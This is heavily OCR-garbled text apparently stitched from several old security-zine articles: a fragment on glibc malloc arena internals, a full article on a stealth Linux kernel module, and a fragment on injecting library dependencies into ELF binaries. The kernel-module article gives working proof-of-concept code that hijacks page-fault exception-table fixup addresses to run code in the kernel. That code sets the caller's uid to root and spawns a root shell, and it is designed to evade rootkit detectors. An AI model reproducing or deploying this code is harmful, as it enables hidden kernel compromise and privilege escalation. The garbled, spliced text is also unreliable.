of malloc_chunks together with a 
are associated with each arena, 

associated only with the /’/main h 
store obtained with calls to MOR 


of memory are maintained mainly 
(forgetting the top chunk and the last_remainder chunk) 
which are initially empty and 
lists is very important 


in 


lists hang. 
‘small’ bins 
while big bi 


evolve 


There 
or 'big 
ns are 


[These are the macros used to index into bins depending of its size: 


>> 
>> 
>> 
>> 
>> 
>> 


b) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH) 

nsigned long) (sz)) >> 3) 

= 0) ? (((unsigned long) (sz) ) 

= 4) ? 56 + (((unsigned long) (sz) ) 

= 20) ? 91 + (((unsigned long) (sz) ) 

= 84) ? 110 + (((unsigned long) (sz)) 
340) ? 119 + (((unsigned long) (sz) ) 
1364) ? 124 + (((unsigned long) (sz) ) 

126) 

w that ’an arena is a configuration 

n array of bins. One or more ‘heaps’ 

except for the ’/main_arena’, which is 

eap’, i.e. the conventional free 

ECORE()...’, which is the one we are 


PRR 


oOuN O OD W 
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interested in. 


This is the way an arena looks like... 


typedef struct _arena { 


mbinptr av 


2*NAV + 2]; 


struct _arena *next; 


size_t size; 


if THRI 


endif 


, 


long stat_l 


BAD STATS 


lock_direct, stat_lock_loop, stat_lock_wait; 


av’ is the array where bins are kept. 


These are the macros used along the source code to access the bins, 


we can see the first two bins are never indexed; they refer to the 


topmost 
improve 


chunk, the last_remainder chunk and a bitvector used to 
seek time, though this is not really important for us. 


/* bitvector of nonempty blocks */ 


define 


top (a) 


define binblocks (a) 
/* The topmost chunk */ 


(bin_at (a, 0) ->size) 


(bin_at (a, 0) ->fd) 


/* remainder from last split */ 
define last_remainder(a) (bin_at(a,1)) 


define bin_at(a, i) BOUNDED_1(_bin_at(a, i)) 
define _bin_at(a, i) ((mbinptr) ((char*) &(((a)-—>av) [2* (1) +2]) - 2*SIZE_SZ)) 
Finally, the main_arena... 
#define IAV(i) _bin_at(&main_arena, i), _bin_at(&main_arena, i) 
static arena main_arena = { 
{ 
0;: 0; 
IAV(0), IAV(1), IAV(2), IAV(3), IAV (4), IAV(5), IAV (6), LAV ( 
TAV (8), IAV (9), IAV (10), IAV (11), IAV (12), IAV(13), TAV (14), IAV ( 
IAV(16), IAV(17), IAV(18), IAV(19), IAV(20), IAV(21), IAV(22), IAV( 
IAV(24), TIAV(25), IAV(26), IAV(27), IAV(28), IAV(29), IAV(30), IAV( 
TAV (32), TAV (33), IAV (34), IAV (35), IAV (36), IAV (37), IAV (38), TAV ( 
IAV(40), IAV(41), IAV(42), IAV(43), IAV(44), IAV(45), IAV(46),  IAV( 
IAV(48), IAV(49), TIAV(50), IAV(51), IAV(52), IAV(53), IAV(54), IAV( 
IAV (56), IAV (57), IAV (58), IAV (59), IAV (60), IAV (61), IAV (62), IAV ( 
IAV (64), IAV (65), IAV (66), IAV (67), IAV (68), IAV (69), IAV (70), TAV ( 
IAV(72), IAV(73), IAV(74), IAV(75), IAV(76), IAV(77), IAV(78),  IAV( 
IAV (80), IAV (81), IAV (82), IAV (83), TAV (84), IAV (85), IAV (86), TAV ( 
IAV (88), IAV (89), IAV (90), TAV (91), IAV (92), IAV (93), IAV (94), TAV ( 
TAV (96), IAV (97), IAV (98), IAV (99), IAV (100), IAV(101), IAV(102), IAV( 
IAV(104), IAV(105), IAV(106), IAV(107), IAV(108), IAV(109), IAV(110), IAV( 
IAV(112), IAV(113), IAV(114), IAV(115), IAV(116), IAV(117), IAV(118), IAV( 
IAV(120), IAV(121), IAV(122), IAV(123), IAV(124), IAV(125), IAV(126), IAV( 
}, 
&main_arena, /* next */ 
0, /* size */ 
if THREAD STATS 
0, O, O, /* stat_lock_direct, stat_lock_loop, stat_lock_wait */ 
endif 
MUTEX_INITIALIZER /* mutex */ 
}; 
The main_arena is the place where the allocator stores the ’bins’ to which 


the free chunks ar 


linked depending on they size. 


The little graph below resumes all the structures detailed befor 


<main_arena> @ libc’s DATA 
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--{ 1 - Introduction 


"Just another Linux LKM"... that’s what you could think reading this 
article, but I think it’s not correct. In the past years, we have seen a 
lot of techniques for hiding many kinds of things, e.g. processes, network 
connection, files, etc. etc., through the use of LKM’s. The first 
techniques were really simple to understand. The real problem with these 
techniques is that they are easy to detect as well. If you replace an 
address in the syscall table, or if you overwrite the first 7 bytes within 
syscall code (as described by Silvio Cesare [4]), it’s quite easy for 
tools such as Kstat [5] and/or AngeL [6] to identify these malicious 
activities. Later, more sophisticated techniques were presented. An 
interesting technique was proposed by kad, who suggested modifying the 
Interrupt Descriptor Table in such a way so as to redirect an exception 
raised from User Space code (such as the "Divide Error") to execute a new 
handler whose address replaced the original one in the IDT entry [7]. This 
idea is pretty but it has two disadvantages: 


1- it’s detectable using an approach based on hash values computed on the 
whole IDT, as shown by AngeL in its latest 0.9.x releases. This is mainly 
due to the fact that the address at which the IDT lives in kernel memory 

can be easily obtained since its value is stored in %idtr register. This 

register can be read with the asm instruction sidt which allows to store 

it in a variable. 


2- if a user cod xecutes a division by 0 (it may happen... ) a strange 
behaviour could appear. Yes, someone could think that this is uncommon if 
we choose the right handler, but what if there is a safer solution? 


The idea I’m proposing has just one goal: to provid ffective stealth 
against all tools used for identifying malicious LKM’s. The technique is 
based on a kernel feature which is never used in practice. In fact, as we 
are going to see, we will be exploiting a general protection mechanism in 
the memory management subsystem. This mechanism is used only if a user 
space code is deeply bugged and this is not usually the case. 


No more words let’s start! 


[ 2 System Calls and User Space Access 
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First of all, a bit of theory. I’11l refer to Linux kernel 2.4.20, however 
the code is almost the same for kernels 2.2. In particular we are 
interested in what happens in some situations when we need to ask a kernel 
feature through a syscall. When a syscall is called from User Space 
(through software interrupt 0x80) the system_call() exception handler is 
executed. Let’s take a look to its implementation, found in 
arch/i386/kernel/entry.S. 


ENTRY (system_call) 
pushl %Seax # save orig_eax 
SAVE_ALL 
GET_CURRENT (%ebx) 
testb $0x02,tsk_ptrace (%ebx) # PT_TRACESYS 
jne tracesys 


cmpl $(NR_syscalls) , %eax 
jae badsys 
call *SYMBOL_NAME (sys_call_table) (, seax, 4) 
movl %eax, EAX (%esp) # save the return value 
[se] 
As we can easily see, system_call() saves all registers’ contents in the 


Kernel Mode stack. It then derives a pointer to the task_struct structure 
of the currently executing process by calling GET_CURRENT (%ebx). Some 
checks are done to verify the correctness of syscall number and to see if 
the process is currently being traced. Finally the syscall is called by 
using sys_call_table, which maintains the addresses of the syscalls, by 
using the syscall number saved in %eax as an offset within the table. Now 
let’s take a look at some particular syscalls. For our purposes, we are 
searching for syscalls which take a User Space pointer as an argument. I 
chose sys_ioctl() but there are other ones with a similar behaviour. 


asmlinkage long sys_ioctl(unsigned int fd, unsigned int cmd, unsigned long 
arg) 
{ 


struct file * filp; 
unsigned int flag; 
int on, error = —EBADF; 


case FIONBIO: 
if ((error = get_user(on, (int *)arg)) != 0) 
break; 
flag = O_NONBLOCK; 


The macro get_user() is used to copy data from User Space to Kernel Space. 
In this case, we are directing our attention at the code for setting non 
blocking I/O on the file descriptor passed to the syscall. An example of 
correct use, from User Space, of this feature could be 


int on = 1; 


ioctl(fd, FIONBIO, &on); 


Let’s take a look at the get_user() implementation which can be found in 
include/asm/uaccess.h. 


#define __get_user_x(size,ret,x,ptr) \ 
__asm__ __volatile__ ("call __get_user_" #size \ 
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:"=a" (ret),"=d" (x) \ 
2g (ptr) ) 


/* Careful: we have to cast the result to the type of the pointer for sign 
reasons */ 


#define get_user(x,ptr) \ 

ce int ret_gu,__val_gu; \ 
switch(sizeof (*(ptr))) { \ 
case 1: get_user_x(l, ret_gu,__val_gu,ptr); break; \ 
case 2: get_user_x(2,__ret_gu,__val_gu,ptr); break; \ 
case 4: get_user_x(4, ret_gu,__val_gu,ptr); break; \ 
default: get_user_x(X, ret_gu,__val_gu,ptr); break; \ 
} . 
(x) = (__typeof__(* (ptr)))__val_gu; \ 
__ret_gu; \ 

}) 

As we can see, get_user() is implemented in a very smart way because it 

calls the right function basing on the size of the argument to be copied 

from User Space. Depending on the value of (sizeof (*(ptr))) __get_user_1() 

, _-get_user_2() or __get_user_4(), would be called. 

Now let’s take a look at one of these functions, __get_user_4(), which can 


be found in arch/i386/lib/getuser.s. 


addr_limit = 12 
eel 


-align 4 
-globl __get_user_4 
__get_user_4: 
addl $3, %eax 
movl %esp, sedx 
jc bad_get_user 
andl SOxffffe000, tedx 
cmpl addr_limit (%edx) , eax 
jae bad_get_user 


3: movl -—3(%eax) , Sedx 
xorl %Seax, Seax 
ret 


bad_get_user: 
xorl %edx, sedx 
movl S-14,%eax 
ret 


.section __ex_table,"a" 

-long 1b,bad_get_user 
.long 2b,bad_get_user 
-long 3b,bad_get_user 
-previous 


The last lines between .section and .previous identify the exception table 
which we’ll discuss later since it’s important for our purposes. 


As it can be seen, the __get_user_4() implementation is straightforward. 
The argument address is in the %eax register. By adding 3 to %eax, it’s 
possible to obtain the greatest User Space referenced address. It’s 
necessary to control if this address is in the User Mode addressable rang 
(from 0x00000000 to PAGE_OFFSET - 1, where PAGE_OFFSET is usually 


Oxc0000000). 


If, when comparing the User Space address with current-—>addr_limit.seg 
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(stored at offset 12 from the beginning of the task descriptor, whose 
pointer was obtained by zeroing the last 13 bits of the Kernel Mode stack 
pointer) we find it is greater than PAGE_OFFSET - 1, we jump to the label 
bad_get_user thus zeroing %Sedx and putting -EFAULT (-14) in %Seax (syscall 
return value). 


But what happens if this address is in the User Mode addressable rang 
(below PAGE_OFFSET) but outside the process address space? Did someone say 
Page Fault?! 


--[ 3 - Page Fault Exception 


"A page fault exception is raised when the addressed page is not present in 
memory, the corresponding page table entry is null or a violation of the 
paging protection mechanism has occurred." [1] 


Linux handles a page fault exception with the page fault handler 
do_page_fault(). This handler can be found in arch/i386/mm/fault.c 


In particular, we are interested in the three cases which may occur when a 
page fault exception occurs in Kernel Mode. 


In the first case, "the kernel attempts to address a page belonging to the 
process address space, but either the corresponding page frame does not 
exist (Demand Paging) or the kernel is trying to write a read-only page 
(Copy On Write)." [1] 


In the second case, "some kernel function includes a programming bug that 
causes the exception to be raised when the program is executed; 
alternatively, the exception might be caused by a transient hardware 
error." [1] 


his two cases are not interesting for our purposes. 


a 


The third (and interesting) case is when "a system call service routine 


(such as sys_ioctl() in our example) attempts to read or write into a 
memory area whose address has been passed as a system call parameter, but 
that address does not belong to the process address space." [1] 


The first case is easily identified by looking at the process memory 
regions. If the address which caused the exception belongs to the process 
a 

i 


ddress space it will fall within a process memory region. This is not 
nteresting for our purposes. 


The interesting thing is how the kernel can distinguish between the second 
and the third case. The key to determining the source of a page fault lies 
in the narrow range of calls that the kernel uses to access the process 
address space. 


For this purpose, the kernel builds an exception table in kernel memory. 
The boundaries of such region are defined by the symbols 

start ex_table and stop ex_table. Their values can be easily 
derived from System.map in this way. 


buffer@rigel:/usr/src/linuxS grep ex_table System.map 
c0261e20 A __start___ex_table 

c0264548 A stop ex_table 
buffer@rigel:/usr/src/linux$ 


What’s the content of this memory region? In this region you could find 
couples of address. The first one (insn) represents the address of the 
instruction (belonging to a function which accesses the User Space address 
range, such as the ones previously described) which may raise a page 
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fault. The second one (fixup) is a pointer to the "fixup code". 


When a page fault occurs within the kernel and the first case (demand 
paging or copy on write) is not verified, the kernel checks if the address 
which caused the page fault matches an insn entry in the exception table. 
If it doesn’t, we are in the second case and the kernel raises an Oops. 
Otherwise, if the address matches an insn entry in the exception table, we 
are in the third case since the page fault exception was raised while 
accessing a User Space address. In this case, the control is passed to the 
function whose address is specified in the exception table as fixup code. 


This is done by simply doing this. 


if ((fixup = search_exception_table(regs->eip)) != 0) { 
regs->eip = fixup; 
return; 
} 
The function search_exception_table() searches for an insn entry in the 


exception table which matches the address of the instruction which raised 
the page fault. If it’s found, it means the page fault exception was 
raised during an access to a User Space address. In this case, regs-—>eip 
is pointed to the fixup code and then do_page_fault() returns thus jumping 
to the fixup code. 


It is obvious to realize that the three functions __get_user_x(), which 
access User Space addresses, must have a fixup code for handling 
Situations like the one depicted befor 


Going back let’s take a look again at __get_user_4() 


-align 4 
-globl __get_user_4 
__get_user_4: 
addl $3, %eax 
movl %esp, Sedx 
jc bad_get_user 
andl SOxffffe000, tedx 
cmpl addr_limit (%Sedx) , seax 
jae bad_get_user 


Ss movl —-3(%eax) , Sedx 
xorl %Seax, Seax 
ret 


bad_get_user: 
xorl %edx, tedx 
movl S$-14,%eax 
ret 


-section __ex_table,"a" 

-long 1b,bad_get_user 
-long 2b,bad_get_user 
.long 3b,bad_get_user 
-previous 


First of all, looking at the code, we should point our attention to the GNU 
Assembler .section directive which allows the programmer to specify which 
section of the executable file will contain the code that follows. The "a" 
attribute specifies that the section must be loaded in memory together 

with the rest of the kernel image. So, in this case, the thr ntries ar 
inserted in the kernel exception table and are loaded with the rest of the 
kernel image. 


Now, taking a look at __get_user_4() there’s an instruction labeled with a 
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33 movl -—-3(%eax) , tedx 


If we added 3 to Seax (it is done in the first instruction of the function 
__get_user_4() for checking purposes as outlined before), -3(%eax) is the 
starting address of the 4-byte argument to copy from User Space. So, this 
is the instruction which really accesses User Space address. Take a look 


at the last entry in the exception table 


-long 3b,bad_get_user 


If you know that the suffix b stands for /’backward’ to indicate that the 
label appears in a previous line of code (and so simply ignore it just for 
understanding the meaning of this code), you could realize that here we 
have 


insn : address of movl -—3(%eax) , sedx 
fixup : address of bad_get_user 


Well guys what we are realizing here is that bad_get_user is the fixup code 
for the function __get_user_4() and it will be called every time the 
instruction labeled 3 raises a page fault. This is obviously still true for 
__get_user_1() and __get_user_2(). 


At this point we need bad_get_user address. 


buffer@rigel:/usr/src/linuxS grep bad_get_user System.map 
c022f39c t bad_get_user 
buffer@rigel:/usr/src/linux$ 


If you compile exception.c (shown later) with flag FIXUP_DEBUG set, you’ll 
see this in your log files which clearly shows what I said before. 


May 23 18:36:35 rigel kernel: address : c0264530 insn: c0O22f361 
fixup : c022f39c 

May 23 18:36:35 rigel kernel: address : c0264538 insn: cO22f37a 
fixup : c022f39c 

May 23 18:36:35 rigel kernel: address : c0264540 insn: c022f£396 


fixup : c022f£39c 


buffer@rigel:/usr/src/linux$S grep __get_user_ System.map 
c022f354 T __get_user_1l 
c022f368 T __get_user_2 
c022f384 T __get_user_4 


Looking at the first entry in the exception table, we can easily realize 
that Oxc022f39c is the address of the instruction labeled 3 in the source 
code within __get_user_4() which may raise the page fault as outlined 
before. Obviously, the situation is similar for the other two functions. 


Now the idea should be clear. If I replace a fixup code address in the 
exception table and then from User Space I just call a syscall with a bad 
address argument I can force the execution of whatever I want. And for 
doing this I need to modify just 4 bytes! Moreover, this appears to be 
particulary stealth since this situation is not so common. In fact, for 
raising this behaviour, it’s necessary that the program you will execute 
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contain a bug in passing an argument to a syscall. If you know this can 
lead to something interesting you could even do it but this situation is 
very uncommon. In the next section I present a proof of concept which 
shows how to exploit what I discussed. In this example, I modified fixup 
code addresses of the thr __get_user_x() functions. 


[ 4 Implementation 


This is the LKM code. In this code, I hardcoded some values taken from my 
System.map file but it’s not needed to edit the source file since thes 
values can be passed to the module when calling insmod for linking it to 
the kernel. If you want more verbosity in the log files, compile it with 
the flag -DFIXUP_DEBUG (as done for showing results presented before). 


[ exception.c ] 


Filename: exception.c 
Creation date: 23.05.2003 
Author: Angelo Dell’Aera ‘buffer’ - buffer@antifork.org 


This program is free software; you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published by 
the Free Software Foundation; either version 2 of the License, or 
(at your option) any later version. 


This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


You should have received a copy of the GNU General Public License 
along with this program; if not, write to the Free Software 
Foundation, Inc., 59 Temple Place, Suite 330, Boston, 

MA 02111-1307 USA 

/ 


SE RSs OE ART aR RSE: RL OG Se) SR 5 Soe ae ae 


ifndef _ KERNEL 
define _ KERNEL 
endif 


ifndef MODUL 
define MODUL 


“el 


endif 

define — START EX TABLE 0xc0261e20 
define _ END EX TABLE 0xc0264548 
define BAD _GET_USER OxcO22f39c 


ll 
n 
4 
> 
ve) 
H 


unsigned long start_ex_table EX_TABLE; 
unsigned long end_ex_table = END EX_TABLE; 
unsigned long bad_get_user = BAD_GET_USER; 


nux/module.h> 
nux/kernel.h> 
nux/slab.h> 


= 


include <] 
include <] 
#include <I] 


= 


= 


ifdef FIXUP_DEBUG 

define PDEBUG(fmt, args...) printk (KERN_DEBUG "[fixup] : " fmt, ##args) 
else 

define PDEBUG(fmt, args...) do {} while(0) 


endif 
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MODULE_PARM(start_ex_table, "1"); 
MODULE_PARM(end_ex_table, "1"); 
MODULE_PARM(bad_get_user, "1"); 


struct old_ex_entry { 
struct old_ex_entry *next; 
unsigned long 
unsigned long 
unsigned long 


}; 


address; 
insn; 
fixup; 


struct old_ex_entry *ex_old_table; 


void hook (void) 


{ 


printk(KERN_INFO "Oh Jesus... it works!\n"); 


} 


void cleanup_module (void) 


{ 


struct old_ex_entry *entry = ex_old_table; 
struct old_ex_entry *tmp; 
if ('entry) 
return; 
while (entry) { 
*(unsigned long *)entry->address = entry->insn; 
*(unsigned long *) ((entry->address) + sizeof (unsigned 
long)) = entry->fixup; 
tmp = entry->next; 
kfree(entry) ; 
entry = tmp; 
} 
return; 
} 
int init_module (void) 
{ 
unsigned long insn = start_ex_table; 
unsigned long fixup; 


struct old_ex_entry *entry, *last_entry; 


ex_old_table = NULL; 

PDEBUG (KERN_INFO "hook at address : %p\n", (void *) hook); 

for(; insn < end_ex_table; insn += 2 * sizeof(unsigned long)) { 
fixup = insn + sizeof (unsigned long); 
if (*(unsigned long *) fixup == BAD_GET_USER) { 


PDEBUG (KERN_INFO “address : %p insn: %1x fixup : %1x\n", 
(void *)insn, *(unsigned long *)insn, 
*(unsigned long *) fixup); 


entry = (struct old_ex_entry *)kmalloc(GFP_ATOMIC, 
sizeof (struct old_ex_entry)); 


if ('entry) 
return -1; 


ntry->next = NULL; 
ntry->address = insn; 
entry->insn = *(unsigned long *)insn; 
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entry->fixup = *(unsigned long *) fixup; 


if (ex_old_table) { 
last_entry = ex_old_table; 


while(last_entry->next != NULL) 
last_entry = last_entry->next; 
last_entry->next = entry; 
} else 
ex_old_table = entry; 
*(unsigned long *)fixup = (unsigned long) hook; 


PDEBUG (KERN_INFO “address : %p insn: %l1x fixup : %1x\n", 
(void *)insn, *(unsigned long *)insn, 
*(unsigned long *) fixup); 


return 0; 


MODULE_LICENSE ("GPL") ; 


And now a simple code which calls ioct1l(2) with a bad argument. 


+ + + + FF F F F FF FF FF F FF FF FF FF FF F OF OF 


[ test.c ] 


Filename: test.c 
Creation date: 23.05.2003 
Author: Angelo Dell’Aera ‘'buffer’ - buffer@antifork.org 


This program is free software; you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published by 
the Free Software Foundation; either version 2 of the License, or 
(at your option) any later version. 


This program is distributed in the hope that it will be useful, 
but WITHOUT ANY WARRANTY; without even the implied warranty of 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
GNU General Public License for more details. 


You should have received a copy of the GNU General Public License 
along with this program; if not, write to the Free Software 
Foundation, Inc., 59 Temple Place, Suite 330, Boston, 

MA 02111-1307 USA 


include <stdio.h> 
include <sys/types.h> 
include <sys/stat.h> 
include <fcntl.h> 
include <unistd.h> 
include <errno.h> 
include <sys/ioctl.h> 
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int fd; 
int res; 
fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU); 
res = ioctl(fd, FIONBIO, NULL); 
printf ("result = $d errno = %$d\n", res, errno); 
return 0; 
} 
Ok let’s look if it works. 
buffer@rigel:~$ gcc -I/usr/src/linux/includ O02 -Wall -c exception.c 
buffer@rigel:~$ gcc -o test test.c 
buffer@rigel:~$ ./test 
result = -1l errno = 14 
As w xpected, we got an EFAULT error (errno = 14). 


Let’s try to 


link our module now. 


buffer@rigel:~S su 

Password: 

bash-2.05b# insmod exception.o 
bash-2.05b# exit 
buffer@rigel:~$ ./test 

result = 25 errno = 0 
buffer@rigel:~$ 


Looking at /var/log/messages 


bash-2.05b# tail -f /usr/adm/messages 
eee 
May 23 21:31:56 rigel kernel: 


Oh Jesus... it works! 


Seems it works fine! 
What can we do now?! 


+) 
Try to take a look at this! 


Just changing the previous hook() function with this simple one 


void hook (void) 


{ 


current->uid = current->euid = 0; 


} 


and using this user space code for triggering the page fault handler 


shell.c 


/* 
* Filename: shell.c 
* Creation date: 23.05.2003 


* Author: Angelo Dell’Aera ’buffer’ - buffer@antifork.org 
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ram is free software; you can redistribute it and/or modify 
the terms of the GNU General Public License as published by 
Software Foundation; either version 2 of the License, or 
option) any later version. 


ram is distributed in the hope that it will be useful, 


ut WITHOUT ANY WARRANTY; without even the implied warranty of 


NU Gener 


You shoul 
along wit 


T 
b 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 
G 


al Public License for more details. 


d have received a copy of the GNU General Public License 
h this program; if not, write to the Free Software 


Foundatio 
MA 02111 


+ + + + FF + + F + FF F FF FF HF OF 


™~ 


include <st 
include <sy 
include <sy 
include <fc 
include <un 
include <er 
include <sy 


int main() 


n, Inc., 59 Temple Place, Suite 330, Boston, 
-1307 USA 


dio.h> 
s/types.h> 
s/stat.h> 
ntl.h> 
istd.h> 
rno.h> 
s/ioctl.h> 


int fd; 
int res; 
char *argv[2]; 
argv[0] = "/bin/sh"; 
argv[1l] = NULL; 
fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU); 
res = ioctl(fd, FIONBIO, NULL); 
printf ("result = $d errno = Sd\n", res, errno); 
execve(argv[0], argv, NULL); 
return 0; 
} 
buffer@rigel:~$ su 
Password: 
bash-2.05b# insmod exception.o 
bash-2.05b# exit 
buffer@rigel:~$ gcc -o shell shell.c 
buffer@rigel:~$ id 
uid=500 (buffer) gid=100(users) groups=100 (users) 
buffer@rigel:~$ ./shell 
result = 25 errno = 0 


sh-2.05b# id 


uid=0 (root) 
sh-2.05b 


Really nice, 


gid=100(users) groups=100 (users) 


isn’t it? :) 


This is just 
to execute a 
what you nee 
raises Page 


an example of what you can do. Using this LKM, you are able 
nything as if you were root. Do you need something else? Well 
d is simply modifying hook() and/or user space code which 
Fault exception... it’s up to your fantasy now! 
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-—- [ 5 - Further Considerations 


When this idea came to my mind I wasn’t able to realize what I really did. 
It came out just as the result of an intellectual masturbation. Just few 
hours later I understood... 


Think about what you need for changing an entry in the syscall table for 
redirecting a system call. Or think about what you need for modifying the 
first 7 bytes of a syscall code as outlined by Silvio. What you need is 
simply a "reference mark". Here, your "reference mark" is the exported 
symbol sys_call_table in both cases. But, unfortunately, you’re not the 
only one who knows it. Detection tools can easily know it (since it’s an 
exported symbol) and so it’s quite simple for them to detect changes in 
the syscall table and/or in the system call code. 


What if you want to modify the Interrupt Descriptor Table as outlined by 
kad? You need a "reference mark" as well. In this case, the "referenc 
mark" is the IDT address in the kernel memory. But this address is easy to 
retrieve too and what a detection tool needs to obtain it is simply this 


long long idtr; 
long __idt_table; 


__asm__ __volatile _("sidt %0\n" : : "m"(idtr)); 
__idt_table = idtr >> 16; 


As result, __idt_table will store the IDT address thus easily obtaining the 
"reference mark" to the IDT. This is done through using sidt asm 
instruction. AngeL, in its latest development releases 0.9.x, uses this 
approach and it’s able to detect in real-time an attack based on what 


stated in [7]. 


Now think again about what I discussed in the previous sections. It’s easy 
to understand that obtaining a "reference mark" to the page fault 
exception table is not so straightforward as in the previous cases. 


The only way for retrieving the page fault exception table address is 
through System.map file. 


hile writing a detection tool whose aim is to detect this kind of attack, 
aking the assumption that the System.map file refers to the currently 
unning kernel could be counterproductive. In fact, if it weren’t true, 

he detection tool could start monitor addresses where not important 
obviously for the purposes of this article) kernel data reside. 


actRsB Ss 


Remember that it’s easy to generate a System.map file through using nm(2) 
but there are a lot of systems out there whose administrators simply 
ignore the role of System.map and don’t maintain it synchronized with the 
currently running kernel. 


—- [ 6 - Conclusions 


Modifying the page fault handler exception table is quite simple as we 
realized. Moreover, it is really stealth since it’s possible to obtain 
great results just modifying 4 bytes in the kernel memory. In my proof of 
concept code, for the sake of simplicity, I modified 12 bytes but it’s 
easy to realize that it’s possible to obtain the same result just 
modifying the __get_user_4() fixup code address. 


Moreover, it’s difficult to find out there programs with bugs of this kind 
which raise this kind of behaviour. Remember that for raising this 
behaviour you have to pass a wrong address to a syscall. How many programs 
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doing this have you seen? I think that this kind of approach is really 
stealth since this situation is never encountered. In fact, these are bugs 
that, if present, are usually corrected by the author before distributing 
their programs. The kernel must implement the approach outlined before but 
it usually never needs to execute it. 


-—- [ 7 - Thanks 


Many thanks to Antifork Research guys... really cool to work with you! 
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union 
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E1£32_ Word 

B1£32_ Addr 
} dlun; 

} EL£32_Dyn; 


= 


For each entry, 
the related val 
dynamic section 


EGIN EXAMPLE 1--- 


h -£ /bin/ls -d 


d_tag; /* Dynamic entry type */ 
d_val; /* Integer value */ 
d_ptr; /* Address value */ 


d_tag is the type (DT_*) and d_val (or d_ptr) is 
ue. Let’s use the elfsh ’-d’ option to print the 


[*] Object /bin/ls has been loaded (O_RDONLY) 
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SHT_DYNAMIC] 
Object /bin/1s] 
00] Name of needed library => librt.so.1 {DT_NEEDED} 
01] Name of needed library => libc.so.6 {DT_NEEDED} 
02] Address of init function => Ox08048F88 {DT_INIT} 
03] Address of fini function => Ox0804F45C {DT_FINT} 
04] Address of symbol hash table => 0x08048128 {DT_HASH} 
05] Address of dynamic string table => 0x08048890 {DT_STRTAB} 
06] Address of dynamic symbol table => 0x08048380 {DT_SYMTAB} 
O07] Size of string table => 821 bytes {DT_STRSZ} 
08] Size of symbol table entry => 16 bytes {DT_SYMENT} 
09] Debugging entry (unknown) => 0x00000000 {DT_DEBUG} 
10] Processor defined value => 0x0805348C {DTI_PLTIGOT} 
11] Size in bytes for .rel.plt => 560 bytes {DT_PLTRELSZ} 
12] Type of reloc in PLT — 17 {DT_PLTREL} 
13] Address of .rel.plt => 0x08048D58 {DT_JMPREL} 
14] Address of .rel.got section => 0x08048D20 {DT_REL} 
15] Total size of .rel section => 56 bytes {DT_RELSZ} 
16] Size of a REL entry => 8 bytes {DT_RELENT} 
17] SUN needed version table => 0x08048CA0 {DT_VERNEED} 
18] SUN needed version number => 2 {DT_VERNEEDNUM } 
19] GNU version VERSYM => Ox08048BFC {DT_VERSYM} 
*] Object /bin/ls unloaded 
$ 
—S--- END EXAMPLE 1-—-—--—- 
The careful reader would have noticed a strange entry of type 
DT_DEBUG. This entry is used in the runtime linker to retrieve 
debugging information, it is present in all GNU tools generated 
binaries but it is not mandatory. The idea is to erase it using 
a forged DT_NEEDED, so that an extra library dependance is added 
to the executable. 
The d_val field of a DT_NEEDED entry contains a relative offset 
from the beginning of the .dynstr section, where we can find the 
library path for this entry. What happens if we want to avoid 
injecting an extra library path string into the .dynstr 
section ? 
SS SS— BEGIN EXAMPLE 2-----— 
S elfsh -f /bin/ls -X dynstr | grep so 
-dynstr + 16 6C69 6272 742E 736F 2E31 0063 6C6F 636B librt.so.1.clock 
dynstr + 48 696E 5F75 7365 6400 6C69 6263 2E73 6F2E in_used.libc.so. 
-dynstr + 176 726E 616C 0071 736F 7274 006D 656D 6370 rnal.qsort.memcp 
.dynstr + 784 6565 OO06D 6273 696E 6974 OOSF 5F64 736F ee.mbsinit.__dso 
$ 
----- END EXAMPLE 2----- 
We just have to choose an existing library path string, but 
avoid starting at the beginning ;). The ELF reference specifies 
clearly that a same string in .dynstr can be used by multiple 
entries at a time: 
Saas BEGIN EXAMPLE 3----- 
S$ cat > /tmp/newlib.c 
function () 


{ 


printf ("my own fonction \n"); 


} 
$ gcc -shared /tmp/newlib.c -o /lib/rt 


.so.l 
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S elfsh 


Welcome to The ELF shell 0.5b9 


This software is under the General Public License 
Please visit http://www.gnu.org to know about Free Software 


7] 
Fy 
w 


h-0.5b9]$ load /bin/1s 
[*] New object /bin/ls loaded on Mon Apr 28 23:09:55 2003 


A 


Fsh-0.5b9]$ d DT_NEEDED | DT_DEBUG 


SHT_DYNAMIC] 
Object /bin/1s] 


00] Name of needed library => librt.so.1 {DT 
O01] Name of needed library => libc.so.6 {DT 
09] Debugging entry (unknown) => 0x00000000 {DT_ 


EEDED } 


A 


Fsh-0.5b9]$ set 1.dynamic[9].tag DT_NEEDED 
*] Field set succesfully 


A 


Fsh-0.5b9]$ set 1l.dynamic[9].val 19 # see .dynstr + 19 
*] Field set succesfully 


A 


Fsh-0.5b9]$ save /tmp/ls.new 
*] Object /tmp/ls.new saved successfully 


A 


Fsh-0.5b9]$ quit 
*] Unloading object 1 (/bin/ls) * 


Good bye ! .::. The ELF shell 0.5b9 


----- END EXAMPLE 3----- 


Lets verify our changes: 


----- BEGIN EXAMPLE 4----- 
S$ elfsh -f ls.new -d DT_NEEDED 


*] Object ls.new has been loaded (O_RDONLY) 


SHT_DYNAMIC] 
Object ls.new] 


00] Name of needed library => librt.so.1 {DT 
O01] Name of needed library => libc.so.6 {DT 
09] Name of needed library => LEssoO. de {DI 


NEEDED } 
NEEDED } 
NEEDED } 


*] Object 1ls.new unloaded 


S ldconfig # refresh /etc/ld.so.cache 


----- END EXAMPLE 4----- 


4 


This method is not extremely stealth because a simple command can 
list all the library dependances for a given binary: 


S$ ldd /tmp/ls.new 

librt.so.1 => /lib/librt.so.1 (0x40021000) 

libc.so.6 => /lib/libc.so.6 (0x40033000) 

rt.so.1 => /lib/rt.so.1 (0x40144000) 

libpthread.so.0 => /lib/libpthread.so.0 (0x40146000) 
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/lib/1ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) 
$ 
Is the executable still working? 
S ./ls.new 
AcroOlAAFj ELFSH_DEBUG ls.new newlib.c 
$ 
OK, so we found a good way to inject as much code as we want in 
a process, by adding a library dependance to the main object, the 
executable object. Now what if we want to hijack functions with 
